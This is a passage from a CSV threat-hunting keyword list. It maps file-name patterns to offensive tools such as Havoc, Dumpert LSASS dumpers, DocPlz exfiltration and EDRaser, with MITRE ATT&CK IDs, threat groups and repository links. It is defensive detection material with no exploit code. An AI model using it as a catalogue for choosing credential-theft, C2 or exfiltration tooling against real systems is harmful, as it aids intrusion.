Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" +"*\daclread.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\darkexe.py*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" +"*\DarkLoadLibrary.*","offensive_tool_keyword","DarkLoadLibrary","LoadLibrary for offensive operations","T1071.001 - T1055.002 - T1055.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/DarkLoadLibrary","1","0","N/A","10","9","875","184","2021-10-22T07:27:58Z","2021-06-17T08:33:47Z" +"*\dcrypt.exe*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*\dcrypt.sys*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*\DCrypt\Bin*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*\dcrypt_setup.exe*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z" +"*\decrypted.dmp*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" +"*\DelegationBOF.*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" +"*\demiguise.py*","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1322","262","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" +"*\demon.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*\demon.x64.bin*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*\demon.x64.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*\demon1.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*\demosyscalls.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*\Dendrobate\*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*\Dendron.bin*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*\Dendron.exe*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*\Dendron.sln*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" +"*\dfscoerce.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\DInjector.sln*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10",,"N/A",,, +"*\DInjector\*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10",,"N/A",,, +"*\dist\sigthief.exe*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","0","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" +"*\dllexploit.cpp*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" +"*\dllexploit.exe*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" +"*\DllExport.bat*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*\DllVoidFunction.txt*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*\dnscan.py*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*\DocsPLZ.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*\DocsPLZ.exe*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*\DoHC2.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*\DomainRecon\*.txt","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*\donut.exe*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*\donut\VanillaProgram.bin*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*\Doraemon*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*\drop-sc.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\duedlligence.dll*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","0","N/A","10","5","442","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" +"*\dumper.ps1*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" +"*\dumpert.*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","0","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*\Dumpert\*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","0","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*\DumpShellcode*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","0","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" +"*\dumpXor.exe*","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","0","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" +"*\dumpXor\x64\*","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","0","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" +"*\ebowla.py*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","0","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" +"*\EDD.exe","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*\edraser.py*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" +"*\Egress-Assess*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*\Ekko.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*\elevateit.bat*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*\ELF\portscan*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*\ELF\serverscan*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*\Elite.csproj*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*\Elite.sln*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*\emailall.py*","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","6","6","577","101","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" +"*\empire_exec.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\enc_shellcode.bin*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll 